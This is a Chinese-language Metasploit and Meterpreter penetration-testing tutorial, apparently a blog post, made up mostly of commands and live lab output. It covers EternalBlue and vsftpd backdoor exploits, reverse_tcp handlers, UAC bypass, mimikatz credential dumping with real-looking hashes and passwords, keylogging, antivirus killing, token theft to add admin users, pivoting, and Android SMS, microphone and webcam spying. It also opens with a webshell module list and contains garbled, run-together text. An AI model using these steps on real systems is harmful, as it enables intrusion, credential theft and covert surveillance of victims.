:file_clearlogRemove string from a file.
:file_editEdit remote file on a local editor.
:file_bzip2 Compress or expand bzip2 files.
:file_upload Upload file to remote filesystem.
:file_downloadDownload file from remote filesystem.
:file_ls List directory content.
:file_webdownload Download an URL.
:file_cp Copy single file.
:file_find Find files with given names and attributes.
:file_enum Check existence and permissions of a list of paths.
:file_tar Compress or expand tar archives.
:file_touchChange file timestamp.
:file_zip Compress or expand zip files.
:file_mountMount remote filesystem using HTTPfs.
:file_gzip Compress or expand gzip files.
:file_cd Change current working directory.
:file_upload2web Upload file automatically to a web folder and get corresponding URL.
:file_read Read remote file from the remote filesystem.
:file_grep Print lines matching a pattern in multiple files.
:file_checkGet attributes and permissions of a file.
:shell_sh Execute shell commands.
:shell_php Execute PHP commands.
:shell_su Execute commands with su.
:sql_dump Multi dbms mysqldump replacement.
:sql_console Execute SQL query or run console.
:system_extensionsCollect PHP and webserver extension list.
:system_info Collect system information.
:system_procs List running processes.
:audit_filesystem Audit the file system for weak permissions.
:audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_etcpasswd Read /etc/passwd with different techniques.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_phpconfAudit PHP configuration.
:bruteforce_sql Bruteforce SQL database.
:backdoor_tcp Spawn a shell on a TCP port.
:backdoor_reversetcp Execute a reverse TCP shell.
:net_scan TCP Port scan.
:net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_ifconfig Get network interfaces addresses.
:net_curl Perform a curl-like HTTP request.
:net_mail Send mail.
:net_phpproxy Install PHP proxy on the target.
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ system_info
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| document_root | C:/xampp/htdocs |
| whoami | |
| hostname | DESKTOP-9A8VFKB |
| pwd | C:\xampp\htdocs\sec\19 |
| open_basedir | |
| safe_mode | False |
| script | /sec/19/testweb.php |
| script_folder | C:\xampp\htdocs\sec\19 |
| uname | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586 |
| os | Windows NT |
| client_ip | 192.168.0.150 |
| max_execution_time | 30 |
| php_self | /sec/19/testweb.php |
| dir_sep | \ |
| php_version | 5.6.28 |
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ autit_filesystem
'autit_filesystem' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���资源文件
最基本的资源文件
#echo version >resource.rc
#echo loadsounds >> version
#echo loadsounds >>resource.rc# msfconsole -r resource.rc
…
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 6.1.27-dev
Console : 6.1.27-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf6 >攻击Windows 7资源文件
windows7.rc
use exploit/windows/smb/ms17_010_eternalblueset rhost 192.168.0.155run |
|---|
# msfconsole -r windows7.rc
…攻击Windows 10资源文件
Windows 10.rc
se exploit/multi/handlerset lhost 192.168.0.150set lport 8888set payload windows/meterpreter/reverse_tcprun |
|---|
# msfconsole -r windows10.rc
…攻击Android资源文件
android.rc
set lhost 192.168.0.150set lport 9999set payload android/meterpreter/reverse_tcp |
|---|
# msfconsole -r android.rc
…渗透Linux
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160
rhost => 192.168.0.160
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.160:21 - USER: 331 Please specify the password.
[+] 192.168.0.160:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05 +0800Meterpreter指南(后渗透技术)
基本命令
meterpreter常用命令
命令 | 作用 | |
|---|---|---|
background | 返回,把Meterpreter后台挂起 | |
sessions | 查看当前建立的会话 | |
sessions -i number | 与第n个会话进行交互 | |
sessions -i | 显示当前的回话 | |
sessions -k number | 与第n个会话进行交互关闭 | |
bgkill | 杀死一个 Meterpreter 脚本 | |
bglist | 提供所有正在运行的后台脚本的列表 | |
bgrun | 作为一个后台线程运行脚本 | |
channel | 显示活动频道 | |
close | 关闭通道 | |
exit | 终止 Meterpreter 会话 | |
quit | 终止 Meterpreter 会话 | |
interact id | 切换进一个信道 | |
run | 执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的autoroute,hashdump,arp_scanner,multi_meter_inject等 | |
irb | 进入 Ruby 脚本模式 | |
read | 从通道读取数据write# 将数据写入到一个通道 | |
use | 加载 meterpreter 的扩展 | |
load/use | 加载模块 | |
Resource | 执行一个已有的rc脚本 | |
针对安卓的命令
dump_contacts
获取手机通讯录
dump_sms
获取短信记录
send_sms -d 15330252525 -t “hello”
控制实验手机发短信
geolocate
获取实验手机GPS定位信息
wlan_geolocate
获取实验手机Wi-Fi定位信息
record_mic -d 5
控制实验手机录音
webcam_list
获取实验手机相机设备
webcam_snap
控制实验手机拍照
webcam_stream
直播实验手机摄像头
针对Windows的一些命令
ps
查看进程:
getpid
查看当前进程号:
sysinfo
查看系统信息:
route
查看完整网络设置:
getsystem
自动提权
getuid
查看当前权限
pwd
查看当前处于目标机的那个目录
其他命令
查看目标机是否为虚拟机:run post/windows/gather/checkvm
关闭杀毒软件:run post/windows/manage/killav
启动远程桌面协议:run post/windows/manage/enable_rdp
列举当前登录的用户:run post/windows/gather/enum_logged_on_users
查看当前应用程序:run post/windows/gather/enum_applications
抓取目标机的屏幕截图:load espia ; screengrab
获取相机设备:webcam_list
控制拍照:webcam_snap
直播摄像头:webcam_stream
控制录音:record_mic
查看当前目录:getlwd
导出当前用户密码哈希 run hashdump
用户名:SID:LM哈希:NTLM哈希:::
也可以使用下面这个命令导出权限更高 run windows/gather/smart_hashdump
抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin
直接获取明文密码(注意这个功能需要获取系统权限获取系统权限需要输入getsystem)
Shell 脚本
进入Windows的终端shell
文件系统命令
文件交互指令
ID | Command | Description |
|---|---|---|
1 | cat | 读取文件内容 |
2 | cd | 切换靶机目录 |
3 | cp | 复制文件到目标 |
4 | mv | 移动到目标 |
5 | chmod | 修改文件权限(比如chmod 777 shell.elf) |
6 | del / rm | 删除靶机文件 |
7 | dir | 打印靶机目录 |
8 | mkdir | 在靶机上创建目录 |
9 | rmdir | 删除靶机目录 |
10 | edit | 编辑文件 |
11 | getlwd | 打印本地目录 |
12 | getwd | 打印靶机目录 |
13 | lcd | 更改本地目录 |
14 | lls | 列出本地目录 |
15 | ls | 列出靶机文件目录 |
16 | lpwd | 打印本地目录 |
17 | pwd | 打印工作目录 |
19 | search | 搜索文件详情search -h |
Linux权限
chmod 777 {文件名.后缀}
chmod 777 shell.elf
upload
上传文件到目标机主上,如upload setup.exe C:\windows\system32
download nimeia.txt /root/Desktop/
# 下载文件到本机上如:download C:\boot.ini /root/或者download C:\“ProgramFiles”\Tencent\QQ\Users\295******125\Msg2.0.db /root/
search
search 文件,如
search -d c:\ -f*.doc
search -d c:\Users\xiang\Desktop -f *.txt
enumdesktops
用户登录数
ipconfig
查看IP地址
其他命令
截屏
meterpreter > screenshot
Screenshot saved to: /home/jerry/BqXLvJAp.jpeg
获得系统信息
meterpreter > sysinfo
Computer : WIN-2VEIIKHJ7M8
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows获取键盘信息
meterpreter > ps
Process List
============
PID PPID NameArch Session User Path
…
exe
1184 1132 explorer.exex64 1 WIN-2VEIIKHJ7M8\小铃铛 C:\Windows\Explorer.EXE
meterpreter > migrate 1184 迁移到1184进程中
[*] Migrating from 2496 to 1184...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WIN-2VEIIKHJ7M8
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt
[*] Recording keystrokes...
^C[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
# cat /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt
Keystroke log from explorer.exe on WIN-2VEIIKHJ7M8 with user WIN-2VEIIKHJ7M8\小铃铛 started at 2022-06-24 13:22:19 +0800
tgest
<^H><^H><^H><^H><^H><^H>test
I a
mFy<^H><^H>Gu
Xiang
www.
3
Keylog Recorder exited at 2022-06-24 13:24:03 +0800提权
最基础的提权
meterpreter >
getuid
Server username:
E86004903967404\Administrator
meterpreter >
getsystem
...got system
via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
getuid
Server username:
NT AUTHORITY\SYSTEM利用漏洞提权
Windows 7
meterpreter >
background
msf6
exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload
configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6
exploit(windows/smb/ms17_010_eternalblue) > use
exploit/windows/smb/ms17_010_eternalblue
[*] Using
configured payload windows/x64/meterpreter/reverse_tcp
msf6
exploit(windows/smb/ms17_010_eternalblue) > set SESSION 1
SESSION =>
1msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.168
rhost =>
192.168.0.168
msf6
exploit(windows/smb/ms17_010_eternalblue) > exploit绕过UAC提权
Windows 7
用户账户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。
meterpreter >
background
msf6
exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] No payload
configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac)
> set session 2
session => 2
msf6
exploit(windows/local/bypassuac) > exploit
[*] Started
reverse TCP handler on 192.168.0.150:4444
[*] UAC is
Enabled, checking level...
[+] UAC is set
to Default
[+] BypassUAC
can bypass this setting, continuing...
…
[*] Meterpreter
session 3 opened (192.168.0.150:4444 -> 192.168.0.168:58389) at 2022-07-19
15:45:06 +0800
meterpreter >
getuid
Server username:
WIN-2VEIIKHJ7M8\小铃铛
meterpreter >
getsystem
...got system
via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
getuid
Server username:
NT AUTHORITY\SYSTEM
meterpreter >触发UAC机制
Windows 10
meterpreter
> background
[*]
Backgrounding session 1...
msf6
exploit(multi/handler) > use exploit/windows/local/ask
[*] No payload
configured, defaulting to windows/meterpreter/reverse_tcp
msf6
exploit(windows/local/ask) > set session 1
session => 1
msf6
exploit(windows/local/ask) > set filename payload.exe
filename =>
payload.exe
msf6 exploit(windows/local/ask)
> exploit
[*] Started
reverse TCP handler on 192.168.0.150:4444
[*] UAC is
Enabled, checking level...
[*] The user
will be prompted, wait for them to click 'Ok'
[*] Uploading
payload.exe - 73802 bytes to the filesystem...
[*] Executing
Command!
[*] Sending
stage (175686 bytes) to 192.168.0.106
[*] Meterpreter
session 2 opened (192.168.0.150:4444 -> 192.168.0.106:2513) at 2022-06-27
11:39:52 +0800
meterpreter
> getsystem
...got system via technique 1 (Named
Pipe Impersonation (In Memory/Admin)).获取用户名密码
提取密码哈希值
Windows 10
meterpreter > getsystem
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ca24769333d0f9419d17e86998b56519:::
xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f:::
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
736 644 lsass.exe x64 0NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
meterpreter > migrate 736
[*] Migrating from 5724 to 736...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...'
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords
…
SID : S-1-5-21-2772671008-4265266102-715737954-1001
msv :
[00000003] Primary
* Username : xianggu625@126.com
* Domain : MicrosoftAccount
* NTLM : 4f151ab2d4afdef65f9664b0422ad83f
tspkg :
wdigest :
* Username : xianggu625@126.com
* Domain : MicrosoftAccount
* Password : (null)
kerberos :
* Username : xianggu625@126.com
* Domain : MicrosoftAccount
* Password : (null)
ssp :
credman :
cloudap :
…重新进入
msf6 exploit(windows/local/ask) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 443
msf6 exploit(multi/handler) set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) set SMBPass aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:21198) at 2022-06-27 16:14:14 +0800
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:21197) at 2022-06-27 16:14:14 +0800
meterpreter >Windows7
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
512 396 lsass.exe x64 0NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
meterpreter > migrate 512
[*] Migrating from 1672 to 512...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session : Interactive from 1
User Name : : WIN-2VEIIKHJ7M8
* LM : 44efce164ab921caaad3b435b51404ee
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
* Username : (null)
* Domain : WIN-2VEIIKHJ7M8
* Password : 123456
wdigest :
* Username : (null)
* Domain : WIN-2VEIIKHJ7M8
* Password : 123456
kerberos :
* Username : (null)
* Domain : WIN-2VEIIKHJ7M8
* Password : 123456
ssp :
credman :
[00000000]���
PPgN
.#####. mimikatz 2.2.0 (x64) #19041 May 17 2022 19:25:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####'> https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session : Interactive from 1
User Name : \Ô۔
Domain: WIN-2VEIIKHJ7M8
Logon Server : WIN-2VEIIKHJ7M8
Logon Time: 2022/6/27 14:58:54
SID : S-1-5-21-2305812133-3308626755-1024735854-1000
msv :
[00000003] Primary
* Username : \Ô۔
* Domain : WIN-2VEIIKHJ7M8
* LM : 44efce164ab921caaad3b435b51404ee
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :
* Username : (null)
* Domain : WIN-2VEIIKHJ7M8
* Password : 123456
wdigest :
* Username : (null)
* Domain : WIN-2VEIIKHJ7M8
* Password : 123456
kerberos :
* Username : (null)
*重新进入
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49194) at 2022-06-27 17:20:14 +0800
meterpreter >令牌假冒添加用户
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
736 644 lsass.exe x64 0NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe meterpreter > steal_token 736
Stolen token with username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
DESKTOP-9A8VFKB\xiang
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\ReportServer
Window Manager\DWM-1
Impersonation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\ANONYMOUS LOGON
NT SERVICE\MSSQLFDLauncher
NT SERVICE\MSSQLSERVER
NT SERVICE\MSSQLServerOLAPService
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > add_user tom 123456 -h 192.168.0.106
[*] Attempting to add user tom to host 192.168.0.106
[+] Successfully added user
meterpreter > add_group_user "administrators" tom -h 192.168.0.106
…跳板
目标为安装vsftpd V2.3.4的Linux机器
Windows10->vsftpd V2.3.4的Linux机器
meterpreter >
run get_local_subnets
[!] Meterpreter
scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run
post/multi/manage/autoroute OPTION=value [...]
Local subnet:
192.168.0.0/255.255.255.0
Local subnet:
192.168.5.0/255.255.255.0
Local subnet:
192.168.81.0/255.255.255.0
meterpreter >
background
[*]
Backgrounding session 3...
msf6
exploit(windows/local/ask) > route add 192.168.0.0 255.255.255.0 3
[*] Route added
msf6
exploit(windows/local/ask) > route print
IPv4 Active
Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
192.168.0.0 255.255.255.0 Session 3
[*] There are
currently no IPv6 routes defined.
msf6
exploit(windows/smb/ms17_010_eternalblue) > use
exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload
configured, defaulting to cmd/unix/interact
msf6
exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload =>
cmd/unix/interact
msf6
exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.171
rhost =>
192.168.0.171
sf6
exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*]
192.168.0.171:21 - Banner: 220 (vsFTPd 2.3.4)
[*]
192.168.0.171:21 - USER: 331 Please specify the password.
[+]
192.168.0.171:21 - Backdoor service has been spawned, handling...
[+]
192.168.0.171:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command
shell session 4 opened (192.168.0.106:29720 -> 192.168.0.171:6200 via
session 3) at 2022-07-19 17:00:32 +0800使用Meterpreter运行脚本
运行VNC
Windows 10
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Users\xiang\AppData\Local\Temp\eiISyc.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
[-] Could not execute vnc: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
到windows里面运行C:\Users\xiang\AppData\Local\Temp\eiISyc.exe会看到效果
meterpreter > [*] VNC Server session 3 opened (192.168.0.150:4545 -> 192.168.0.106:8611) at 2022-06-28 11:38:32 +0800
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "desktop-9a8vfkb"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encodingWindows 7
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\YNpMWsIZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
[*] VNC Server session 2 opened (192.168.0.150:4545 -> 192.168.0.158:49170) at 2022-06-28 12:22:50 +0800
Desktop name "win-2veiikhj7m8"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
迁移进程
meterpreter > run post/windows/manage/migrate
[*] Running module against DESKTOP-9A8VFKB
[*] Current server process: payload.exe (8716)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 9944
[+] Successfully migrated into process 9944关闭杀毒软件
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...获取系统密码哈希值
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[-] Error: ArgumentError wrong number of arguments (given 4, expected 5) …所以改用
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against DESKTOP-9A8VFKB
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220628120236_default_192.168.0.106_windows.hashes_115893.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
[+]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] xiang:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] tom:1010:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::或
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
tom:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::获取目标机上流量
目标机必须支持:rpcapd service,在Windows上安装winpcap即可
meterpreter > run post/windows/manage/rpcapd_start
[*] Checking if machine DESKTOP-9A8VFKB has rpcapd service
[*] Rpcap service found: Remote Packet Capture Protocol v.0 (experimental)
[*] Setting rpcapd as 'auto' service
[*] Enabling rpcapd.exe in Windows Firewall
[*] Installing rpcap in PASSIVE mode (local port: 2002)
[+] Rpcapd started successfully: C:\Program Files (x86)\winpcap\rpcapd.exe -d -p 2002 -n获取系统信息
Windows 10
meterpreter >run scraper
[*] New session on 192.168.0.106:7216...
[*] Gathering basic system information...
[-] Failed to run command net view
[-] Error: Rex::TimeoutError Operation timed out.
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Users\xiang\AppData\Local\Temp\WLNUaYcc.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[-] Failed to run command reg.exe export HKLM C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg
[-] Error: Rex::TimeoutError Operation timed out.
[*] Downloading HKLM (C:\Users\xiang\AppData\Local\Temp\IymTDekJ.reg)
[*] Exception: Rex::Post::Windows 7
meterpreter > run scraper
[*] New session on 192.168.0.158:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\sbOwIdlG.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\pQzbPtfD.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\xdgVency.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\aWoyKSRV.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\abgTRNGl.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.0.158:445...Windows 2003
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > run scraper
[*] New session on 192.168.0.169:1438...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\IatUIdPZ.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JcjKKLfF.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gLgAxVWq.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\KDJAycay.reg)
[*] Cleaning HKCR
[*] Exporting HKU
